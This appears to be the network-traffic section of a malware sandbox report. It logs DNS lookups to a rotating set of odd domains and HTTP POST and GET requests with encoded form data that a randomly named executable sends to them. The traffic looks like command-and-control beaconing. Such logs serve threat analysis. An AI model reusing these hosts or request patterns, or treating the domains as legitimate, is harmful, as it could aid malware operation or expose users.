Jan 8, 2025 16:15:15.091021061 CET  80  50041  194.245.148.189  192.168.2.4
Jan 8, 2025 16:15:15.091028929 CET  80  50041  194.245.148.189  192.168.2.4
Jan 8, 2025 16:15:15.091037035 CET  80  50041  194.245.148.189  192.168.2.4
Jan 8, 2025 16:15:15.091046095 CET  80  50041  194.245.148.189  192.168.2.4
Jan 8, 2025 16:15:15.091048956 CET  80  50041  194.245.148.189  192.168.2.4
Jan 8, 2025 16:15:15.091144085 CET  80  50041  194.245.148.189  192.168.2.4
Jan 8, 2025 16:15:15.774914026 CET  80  50041  194.245.148.189  192.168.2.4
Jan 8, 2025 16:15:15.775185108 CET  80  50041  194.245.148.189  192.168.2.4
Jan 8, 2025 16:15:15.775249004 CET  50041  80  192.168.2.4  194.245.148.189
Jan 8, 2025 16:15:16.589597940 CET  50041  80  192.168.2.4  194.245.148.189
Jan 8, 2025 16:15:17.608175039 CET  50042  80  192.168.2.4  194.245.148.189
Jan 8, 2025 16:15:17.613030910 CET  80  50042  194.245.148.189  192.168.2.4
Jan 8, 2025 16:15:17.613101006 CET  50042  80  192.168.2.4  194.245.148.189
Jan 8, 2025 16:15:17.622776985 CET  50042  80  192.168.2.4  194.245.148.189
Jan 8, 2025 16:15:17.627579927 CET  80  50042  194.245.148.189  192.168.2.4
Jan 8, 2025 16:15:18.236078024 CET  80  50042  194.245.148.189  192.168.2.4
Jan 8, 2025 16:15:18.236100912 CET  80  50042  194.245.148.189  192.168.2.4
Jan 8, 2025 16:15:18.236113071 CET  80  50042  194.245.148.189  192.168.2.4
Jan 8, 2025 16:15:18.236238956 CET  80  50042  194.245.148.189  192.168.2.4
Jan 8, 2025 16:15:18.236252069 CET  50042  80  192.168.2.4  194.245.148.189
Jan 8, 2025 16:15:18.236293077 CET  50042  80  192.168.2.4  194.245.148.189
                                                                      Jan 8, 2025 16:15:18.241122007 CET5004280192.168.2.4194.245.148.189
                                                                      Jan 8, 2025 16:15:18.245863914 CET8050042194.245.148.189192.168.2.4
                                                                      Jan 8, 2025 16:15:23.383472919 CET5004380192.168.2.4199.59.243.228
                                                                      Jan 8, 2025 16:15:23.388250113 CET8050043199.59.243.228192.168.2.4
                                                                      Jan 8, 2025 16:15:23.388349056 CET5004380192.168.2.4199.59.243.228
                                                                      Jan 8, 2025 16:15:23.403045893 CET5004380192.168.2.4199.59.243.228
                                                                      Jan 8, 2025 16:15:23.407852888 CET8050043199.59.243.228192.168.2.4
                                                                      Jan 8, 2025 16:15:23.844939947 CET8050043199.59.243.228192.168.2.4
                                                                      Jan 8, 2025 16:15:23.844957113 CET8050043199.59.243.228192.168.2.4
                                                                      Jan 8, 2025 16:15:23.844969034 CET8050043199.59.243.228192.168.2.4
                                                                      Jan 8, 2025 16:15:23.845041037 CET5004380192.168.2.4199.59.243.228
                                                                      Jan 8, 2025 16:15:24.917720079 CET5004380192.168.2.4199.59.243.228
                                                                      Jan 8, 2025 16:15:25.942780972 CET5004480192.168.2.4199.59.243.228
                                                                      Jan 8, 2025 16:15:25.947660923 CET8050044199.59.243.228192.168.2.4
                                                                      Jan 8, 2025 16:15:25.947752953 CET5004480192.168.2.4199.59.243.228
                                                                      Jan 8, 2025 16:15:25.962300062 CET5004480192.168.2.4199.59.243.228
                                                                      Jan 8, 2025 16:15:25.967127085 CET8050044199.59.243.228192.168.2.4
                                                                      Jan 8, 2025 16:15:26.403902054 CET8050044199.59.243.228192.168.2.4
                                                                      Jan 8, 2025 16:15:26.403923035 CET8050044199.59.243.228192.168.2.4
                                                                      Jan 8, 2025 16:15:26.403999090 CET5004480192.168.2.4199.59.243.228
                                                                      Jan 8, 2025 16:15:26.404043913 CET8050044199.59.243.228192.168.2.4
                                                                      Jan 8, 2025 16:15:26.404089928 CET5004480192.168.2.4199.59.243.228
                                                                      Jan 8, 2025 16:15:27.464546919 CET5004480192.168.2.4199.59.243.228
                                                                      Jan 8, 2025 16:15:28.483031034 CET5004580192.168.2.4199.59.243.228
                                                                      Jan 8, 2025 16:15:28.487894058 CET8050045199.59.243.228192.168.2.4
                                                                      Jan 8, 2025 16:15:28.487983942 CET5004580192.168.2.4199.59.243.228
                                                                      Jan 8, 2025 16:15:28.502588987 CET5004580192.168.2.4199.59.243.228
                                                                      Jan 8, 2025 16:15:28.507424116 CET8050045199.59.243.228192.168.2.4
                                                                      Jan 8, 2025 16:15:28.507432938 CET8050045199.59.243.228192.168.2.4
                                                                      Jan 8, 2025 16:15:28.507441044 CET8050045199.59.243.228192.168.2.4
                                                                      Jan 8, 2025 16:15:28.507451057 CET8050045199.59.243.228192.168.2.4
                                                                      Jan 8, 2025 16:15:28.507494926 CET8050045199.59.243.228192.168.2.4
                                                                      Jan 8, 2025 16:15:28.507503033 CET8050045199.59.243.228192.168.2.4
                                                                      Jan 8, 2025 16:15:28.507546902 CET8050045199.59.243.228192.168.2.4
                                                                      Jan 8, 2025 16:15:28.507602930 CET8050045199.59.243.228192.168.2.4
                                                                      Jan 8, 2025 16:15:28.507611036 CET8050045199.59.243.228192.168.2.4
                                                                      Jan 8, 2025 16:15:28.949136972 CET8050045199.59.243.228192.168.2.4
                                                                      Jan 8, 2025 16:15:28.949157953 CET8050045199.59.243.228192.168.2.4
                                                                      Jan 8, 2025 16:15:28.949170113 CET8050045199.59.243.228192.168.2.4
                                                                      Jan 8, 2025 16:15:28.949228048 CET5004580192.168.2.4199.59.243.228
                                                                      Jan 8, 2025 16:15:30.011538982 CET5004580192.168.2.4199.59.243.228
                                                                      Jan 8, 2025 16:15:31.038285971 CET5004680192.168.2.4199.59.243.228
                                                                      Jan 8, 2025 16:15:31.107162952 CET8050046199.59.243.228192.168.2.4
                                                                      Jan 8, 2025 16:15:31.107234955 CET5004680192.168.2.4199.59.243.228
                                                                      Jan 8, 2025 16:15:31.308042049 CET5004680192.168.2.4199.59.243.228
                                                                      Jan 8, 2025 16:15:31.312880039 CET8050046199.59.243.228192.168.2.4
                                                                      Jan 8, 2025 16:15:31.561660051 CET8050046199.59.243.228192.168.2.4
                                                                      Jan 8, 2025 16:15:31.561676979 CET8050046199.59.243.228192.168.2.4
                                                                      Jan 8, 2025 16:15:31.561803102 CET8050046199.59.243.228192.168.2.4
                                                                      Jan 8, 2025 16:15:31.561800957 CET5004680192.168.2.4199.59.243.228
                                                                      Jan 8, 2025 16:15:31.561916113 CET5004680192.168.2.4199.59.243.228
                                                                      Jan 8, 2025 16:15:31.564285994 CET5004680192.168.2.4199.59.243.228
                                                                      Jan 8, 2025 16:15:31.569016933 CET8050046199.59.243.228192.168.2.4
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Jan 8, 2025 16:12:49.570708990 CET5142453192.168.2.41.1.1.1
                                                                      Jan 8, 2025 16:12:49.584556103 CET53514241.1.1.1192.168.2.4
                                                                      Jan 8, 2025 16:13:05.265604973 CET6346453192.168.2.41.1.1.1
                                                                      Jan 8, 2025 16:13:05.983771086 CET53634641.1.1.1192.168.2.4
                                                                      Jan 8, 2025 16:13:18.998986006 CET6327353192.168.2.41.1.1.1
                                                                      Jan 8, 2025 16:13:19.011295080 CET53632731.1.1.1192.168.2.4
                                                                      Jan 8, 2025 16:13:32.405332088 CET6182653192.168.2.41.1.1.1
                                                                      Jan 8, 2025 16:13:33.417515993 CET6182653192.168.2.41.1.1.1
                                                                      Jan 8, 2025 16:13:33.931515932 CET53618261.1.1.1192.168.2.4
                                                                      Jan 8, 2025 16:13:33.931529045 CET53618261.1.1.1192.168.2.4
                                                                      Jan 8, 2025 16:13:47.562164068 CET5221853192.168.2.41.1.1.1
                                                                      Jan 8, 2025 16:13:47.725600958 CET53522181.1.1.1192.168.2.4
                                                                      Jan 8, 2025 16:14:00.936997890 CET6475753192.168.2.41.1.1.1
                                                                      Jan 8, 2025 16:14:01.809423923 CET53647571.1.1.1192.168.2.4
                                                                      Jan 8, 2025 16:14:15.358736038 CET5587653192.168.2.41.1.1.1
                                                                      Jan 8, 2025 16:14:15.376188993 CET53558761.1.1.1192.168.2.4
                                                                      Jan 8, 2025 16:14:29.035388947 CET6420653192.168.2.41.1.1.1
                                                                      Jan 8, 2025 16:14:29.423208952 CET53642061.1.1.1192.168.2.4
                                                                      Jan 8, 2025 16:14:43.127130032 CET6314153192.168.2.41.1.1.1
                                                                      Jan 8, 2025 16:14:43.137778997 CET53631411.1.1.1192.168.2.4
                                                                      Jan 8, 2025 16:14:56.438415051 CET6441953192.168.2.41.1.1.1
                                                                      Jan 8, 2025 16:14:56.454102039 CET53644191.1.1.1192.168.2.4
                                                                      Jan 8, 2025 16:15:09.943142891 CET5023653192.168.2.41.1.1.1
                                                                      Jan 8, 2025 16:15:09.966133118 CET53502361.1.1.1192.168.2.4
                                                                      Jan 8, 2025 16:15:23.249109983 CET6553253192.168.2.41.1.1.1
                                                                      Jan 8, 2025 16:15:23.381180048 CET53655321.1.1.1192.168.2.4
                                                                       Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                                       Jan 8, 2025 16:12:49.570708990 CET | 192.168.2.4 | 1.1.1.1 | 0xf4ba | Standard query (0) | www.zkdamdjj.shop | A (IP address) | IN (0x0001) | false
                                                                       Jan 8, 2025 16:13:05.265604973 CET | 192.168.2.4 | 1.1.1.1 | 0xbeef | Standard query (0) | www.75178.club | A (IP address) | IN (0x0001) | false
                                                                       Jan 8, 2025 16:13:18.998986006 CET | 192.168.2.4 | 1.1.1.1 | 0xdf3f | Standard query (0) | www.orbitoasis.online | A (IP address) | IN (0x0001) | false
                                                                       Jan 8, 2025 16:13:32.405332088 CET | 192.168.2.4 | 1.1.1.1 | 0x17cd | Standard query (0) | www.thaor56.online | A (IP address) | IN (0x0001) | false
                                                                       Jan 8, 2025 16:13:33.417515993 CET | 192.168.2.4 | 1.1.1.1 | 0x17cd | Standard query (0) | www.thaor56.online | A (IP address) | IN (0x0001) | false
                                                                       Jan 8, 2025 16:13:47.562164068 CET | 192.168.2.4 | 1.1.1.1 | 0x8fac | Standard query (0) | www.earbudsstore.shop | A (IP address) | IN (0x0001) | false
                                                                       Jan 8, 2025 16:14:00.936997890 CET | 192.168.2.4 | 1.1.1.1 | 0x235b | Standard query (0) | www.superiorfencing.net | A (IP address) | IN (0x0001) | false
                                                                       Jan 8, 2025 16:14:15.358736038 CET | 192.168.2.4 | 1.1.1.1 | 0x766 | Standard query (0) | www.beylikduzu616161.xyz | A (IP address) | IN (0x0001) | false
                                                                       Jan 8, 2025 16:14:29.035388947 CET | 192.168.2.4 | 1.1.1.1 | 0x166d | Standard query (0) | www.zxyck.net | A (IP address) | IN (0x0001) | false
                                                                       Jan 8, 2025 16:14:43.127130032 CET | 192.168.2.4 | 1.1.1.1 | 0x717a | Standard query (0) | www.dailyfuns.info | A (IP address) | IN (0x0001) | false
                                                                       Jan 8, 2025 16:14:56.438415051 CET | 192.168.2.4 | 1.1.1.1 | 0x188f | Standard query (0) | www.mydreamdeal.click | A (IP address) | IN (0x0001) | false
                                                                       Jan 8, 2025 16:15:09.943142891 CET | 192.168.2.4 | 1.1.1.1 | 0x532a | Standard query (0) | www.maitreyatoys.world | A (IP address) | IN (0x0001) | false
                                                                       Jan 8, 2025 16:15:23.249109983 CET | 192.168.2.4 | 1.1.1.1 | 0x987a | Standard query (0) | www.dating-apps-az-dn5.xyz | A (IP address) | IN (0x0001) | false
                                                                       Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                       Jan 8, 2025 16:12:49.584556103 CET | 1.1.1.1 | 192.168.2.4 | 0xf4ba | No error (0) | www.zkdamdjj.shop | - | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                                                                       Jan 8, 2025 16:12:49.584556103 CET | 1.1.1.1 | 192.168.2.4 | 0xf4ba | No error (0) | www.zkdamdjj.shop | - | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                                                                       Jan 8, 2025 16:13:05.983771086 CET | 1.1.1.1 | 192.168.2.4 | 0xbeef | No error (0) | www.75178.club | uaslkd.skasdhu.huhusddfnsuegcdn.com | - | CNAME (Canonical name) | IN (0x0001) | false
                                                                       Jan 8, 2025 16:13:05.983771086 CET | 1.1.1.1 | 192.168.2.4 | 0xbeef | No error (0) | uaslkd.skasdhu.huhusddfnsuegcdn.com | gtml.huksa.huhusddfnsuegcdn.com | - | CNAME (Canonical name) | IN (0x0001) | false
                                                                       Jan 8, 2025 16:13:05.983771086 CET | 1.1.1.1 | 192.168.2.4 | 0xbeef | No error (0) | gtml.huksa.huhusddfnsuegcdn.com | - | 23.167.152.41 | A (IP address) | IN (0x0001) | false
                                                                       Jan 8, 2025 16:13:19.011295080 CET | 1.1.1.1 | 192.168.2.4 | 0xdf3f | No error (0) | www.orbitoasis.online | orbitoasis.online | - | CNAME (Canonical name) | IN (0x0001) | false
                                                                       Jan 8, 2025 16:13:19.011295080 CET | 1.1.1.1 | 192.168.2.4 | 0xdf3f | No error (0) | orbitoasis.online | - | 66.29.132.194 | A (IP address) | IN (0x0001) | false
                                                                       Jan 8, 2025 16:13:33.931515932 CET | 1.1.1.1 | 192.168.2.4 | 0x17cd | No error (0) | www.thaor56.online | thaor56.online | - | CNAME (Canonical name) | IN (0x0001) | false
                                                                       Jan 8, 2025 16:13:33.931515932 CET | 1.1.1.1 | 192.168.2.4 | 0x17cd | No error (0) | thaor56.online | - | 202.92.5.23 | A (IP address) | IN (0x0001) | false
                                                                       Jan 8, 2025 16:13:33.931529045 CET | 1.1.1.1 | 192.168.2.4 | 0x17cd | No error (0) | www.thaor56.online | thaor56.online | - | CNAME (Canonical name) | IN (0x0001) | false
                                                                       Jan 8, 2025 16:13:33.931529045 CET | 1.1.1.1 | 192.168.2.4 | 0x17cd | No error (0) | thaor56.online | - | 202.92.5.23 | A (IP address) | IN (0x0001) | false
                                                                       Jan 8, 2025 16:13:47.725600958 CET | 1.1.1.1 | 192.168.2.4 | 0x8fac | No error (0) | www.earbudsstore.shop | - | 194.195.220.41 | A (IP address) | IN (0x0001) | false
                                                                       Jan 8, 2025 16:14:01.809423923 CET | 1.1.1.1 | 192.168.2.4 | 0x235b | No error (0) | www.superiorfencing.net | superiorfencing.net | - | CNAME (Canonical name) | IN (0x0001) | false
                                                                       Jan 8, 2025 16:14:01.809423923 CET | 1.1.1.1 | 192.168.2.4 | 0x235b | No error (0) | superiorfencing.net | - | 103.230.159.86 | A (IP address) | IN (0x0001) | false
                                                                       Jan 8, 2025 16:14:15.376188993 CET | 1.1.1.1 | 192.168.2.4 | 0x766 | No error (0) | www.beylikduzu616161.xyz | - | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                                                                       Jan 8, 2025 16:14:15.376188993 CET | 1.1.1.1 | 192.168.2.4 | 0x766 | No error (0) | www.beylikduzu616161.xyz | - | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                                                                       Jan 8, 2025 16:14:29.423208952 CET | 1.1.1.1 | 192.168.2.4 | 0x166d | No error (0) | www.zxyck.net | - | 118.107.250.103 | A (IP address) | IN (0x0001) | false
                                                                       Jan 8, 2025 16:14:43.137778997 CET | 1.1.1.1 | 192.168.2.4 | 0x717a | No error (0) | www.dailyfuns.info | - | 209.74.77.109 | A (IP address) | IN (0x0001) | false
                                                                       Jan 8, 2025 16:14:56.454102039 CET | 1.1.1.1 | 192.168.2.4 | 0x188f | No error (0) | www.mydreamdeal.click | - | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                                                                       Jan 8, 2025 16:14:56.454102039 CET | 1.1.1.1 | 192.168.2.4 | 0x188f | No error (0) | www.mydreamdeal.click | - | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                                                                       Jan 8, 2025 16:15:09.966133118 CET | 1.1.1.1 | 192.168.2.4 | 0x532a | No error (0) | www.maitreyatoys.world | - | 194.245.148.189 | A (IP address) | IN (0x0001) | false
                                                                       Jan 8, 2025 16:15:23.381180048 CET | 1.1.1.1 | 192.168.2.4 | 0x987a | No error (0) | www.dating-apps-az-dn5.xyz | - | 199.59.243.228 | A (IP address) | IN (0x0001) | false
                                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                       0 | 192.168.2.4 | 49736 | 188.114.96.3 | 80 | 3752 | C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                       Timestamp | Bytes transferred | Direction | Data
                                                                       Jan 8, 2025 16:12:49.605431080 CET | 489 | OUT | GET /vluw/?F4=Q0yHy&xP7x=Qny9vPKZpQxlYqiENFjzCT0tS9CtbOtoVbvPUumHvVgYiZzoUIcT00lHd/ClJ1QqOMs3sbdEqCPN2Gnhne5G+xnVYsPewXyxj+EGxgkPVAzfrNGcH22OaL0= HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.zkdamdjj.shop
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                       Jan 8, 2025 16:12:50.220717907 CET | 940 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Wed, 08 Jan 2025 15:12:50 GMT
                                                                      Content-Type: text/html
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      cf-cache-status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vg9K6nnpsc8a5xr7oBYICIlg96XaNb08ap2IHSE9WTt504awDpJiBxITKkB22lCc6fTq9vD1MdijigyNDqOzbENNnC%2FxSMbdVOQf%2FPyvdIoXH4EcfMPsP%2BSkY4v%2B84YK5kqw0g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8fed20c879421891-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1694&min_rtt=1694&rtt_var=847&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=489&delivery_rate=0&cwnd=170&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Ascii: 99<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0</center></body></html>0


                                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                       1 | 192.168.2.4 | 49737 | 23.167.152.41 | 80 | 3752 | C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                       Timestamp | Bytes transferred | Direction | Data
                                                                       Jan 8, 2025 16:13:06.004537106 CET | 749 | OUT | POST /a4h7/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.75178.club
                                                                      Origin: http://www.75178.club
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 201
                                                                      Connection: close
                                                                      Referer: http://www.75178.club/a4h7/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Ascii: xP7x=CNSmGsCqDpYV27NSNDCGvEBAT3mVrmr7pibzS+P1Ei5W71ETA6wLnWSQ95pJWTNxecl0F4+3n+K4ANjdP8ncLHBaVSjV247or6gk21eileVPLvjEJQ7Wg4tz7RBHtv4SI4LJJ92S0h4xWpn0eKfM4dkGMKg/ukYHaVT6CysBVP6t+hckKFs1otsQJEt1rYUvcg==


                                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                       2 | 192.168.2.4 | 49738 | 23.167.152.41 | 80 | 3752 | C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                       Timestamp | Bytes transferred | Direction | Data
                                                                       Jan 8, 2025 16:13:08.550069094 CET | 769 | OUT | POST /a4h7/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.75178.club
                                                                      Origin: http://www.75178.club
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 221
                                                                      Connection: close
                                                                      Referer: http://www.75178.club/a4h7/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Ascii: xP7x=CNSmGsCqDpYV1a9SIiCG+0BDNnmVy2r3piXzS/LlEURW7RUTB/MLkWSQyZpIYzNMecpWF663n+u4AMTdPMbdKXBYBijX8Y7or6gk21KElf9PLfTEI0vV+otyshBH6/56I4L3J86o0n8xWrP0efzTydkICqhYtV5jQ1CZBksRbtOQ7nR+b0Ni6tIjUDkBmbpmHh1M4aWIZmmMGxH1iX/NbwA=


                                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                       3 | 192.168.2.4 | 49739 | 23.167.152.41 | 80 | 3752 | C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                       Timestamp | Bytes transferred | Direction | Data
                                                                       Jan 8, 2025 16:13:11.096854925 CET | 10851 | OUT | POST /a4h7/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.75178.club
                                                                      Origin: http://www.75178.club
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 10301
                                                                      Connection: close
                                                                      Referer: http://www.75178.club/a4h7/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 78 50 37 78 3d 43 4e 53 6d 47 73 43 71 44 70 59 56 31 61 39 53 49 69 43 47 2b 30 42 44 4e 6e 6d 56 79 32 72 33 70 69 58 7a 53 2f 4c 6c 45 55 70 57 37 47 38 54 42 59 59 4c 72 32 53 51 2f 35 70 4e 59 7a 4e 64 65 63 68 53 46 36 33 43 6e 38 47 34 53 61 48 64 59 50 44 64 41 58 42 59 65 79 6a 57 32 34 36 79 72 36 77 67 32 31 61 45 6c 66 39 50 4c 63 4c 45 4d 67 37 56 38 6f 74 7a 37 52 42 4c 74 76 34 58 49 2b 6a 34 4a 38 2b 34 31 57 41 78 57 4c 66 30 5a 74 72 54 30 4e 6c 75 50 4b 68 41 74 56 31 38 51 30 75 76 42 6b 77 37 62 75 53 51 32 53 34 65 45 33 70 70 67 4e 4d 6e 58 68 55 35 2f 38 5a 39 4b 6e 56 4b 30 6f 76 51 45 48 36 38 64 43 75 77 7a 56 66 36 4e 55 50 2b 54 48 6f 6f 64 4f 47 4b 50 39 30 74 4c 55 46 64 70 34 67 6b 52 57 55 2b 31 70 32 50 42 57 38 55 65 70 5a 4e 72 69 4a 67 57 70 4e 54 39 49 6a 5a 46 7a 69 46 2b 50 77 48 62 39 4b 55 48 72 69 70 5a 56 67 34 48 76 5a 6b 68 33 78 32 59 63 63 43 6e 4b 79 31 66 41 2f 54 79 48 56 2f 4a 38 64 35 4a 71 4e 34 61 6e 7a 31 7a 4f 4a 75 62 6e 4f 67 72 63 39 4b 34 [TRUNCATED]
                                                                      Data Ascii: xP7x= [TRUNCATED]


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      4 | 192.168.2.4 | 49740 | 23.167.152.41 | 80 | 3752 | C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 8, 2025 16:13:13.637958050 CET | 486 | OUT | GET /a4h7/?xP7x=PP6GFaOQILwxi5diAyqRnR0HCUuPn1KM7xDYUPH7LXca8g8uO5tY4GvA0apkUDdsINAyEZvfq9K0A+PIYqHQKmR9Tyuvz8OKoog24WuNruFHA9eSGHCBo40=&F4=Q0yHy HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.75178.club
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      5 | 192.168.2.4 | 49741 | 66.29.132.194 | 80 | 3752 | C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Jan 8, 2025 16:13:19.033127069 CET | 770 | OUT | POST /k6yn/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.orbitoasis.online
                                                                      Origin: http://www.orbitoasis.online
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 201
                                                                      Connection: close
                                                                      Referer: http://www.orbitoasis.online/k6yn/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 78 50 37 78 3d 67 50 42 36 32 5a 47 32 79 50 65 30 50 6d 62 50 61 63 6c 65 76 75 48 76 45 39 4e 61 4c 32 51 6c 49 53 38 74 31 48 76 4b 75 31 68 76 34 78 67 47 6f 42 64 61 4a 35 67 59 4f 34 58 56 46 69 41 47 57 73 76 6d 36 51 67 68 59 73 4d 4a 31 65 74 30 50 4b 4a 69 30 41 61 49 35 35 6f 66 69 50 34 50 66 4b 75 57 69 37 56 4e 67 47 46 59 31 39 6a 73 6e 4f 41 67 7a 47 72 33 38 6b 59 54 6f 42 6b 5a 69 72 5a 6a 30 4a 6d 46 32 6c 46 34 34 59 62 74 6c 32 52 46 6b 67 4d 32 44 48 48 6c 66 4a 42 58 39 67 2f 78 7a 52 6b 6b 68 63 75 55 44 6e 61 4a 71 72 76 33 35 72 61 57 43 71 68 4f 4e 47 4d 4e 79 41 3d 3d
                                                                      Data Ascii: xP7x=gPB62ZG2yPe0PmbPaclevuHvE9NaL2QlIS8t1HvKu1hv4xgGoBdaJ5gYO4XVFiAGWsvm6QghYsMJ1et0PKJi0AaI55ofiP4PfKuWi7VNgGFY19jsnOAgzGr38kYToBkZirZj0JmF2lF44Ybtl2RFkgM2DHHlfJBX9g/xzRkkhcuUDnaJqrv35raWCqhONGMNyA==
                                                                      Jan 8, 2025 16:13:19.609467030 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                      keep-alive: timeout=5, max=100
                                                                      content-type: text/html
                                                                      transfer-encoding: chunked
                                                                      content-encoding: gzip
                                                                      vary: Accept-Encoding
                                                                      date: Wed, 08 Jan 2025 15:13:19 GMT
                                                                      server: LiteSpeed
                                                                      x-turbo-charged-by: LiteSpeed
                                                                      connection: close
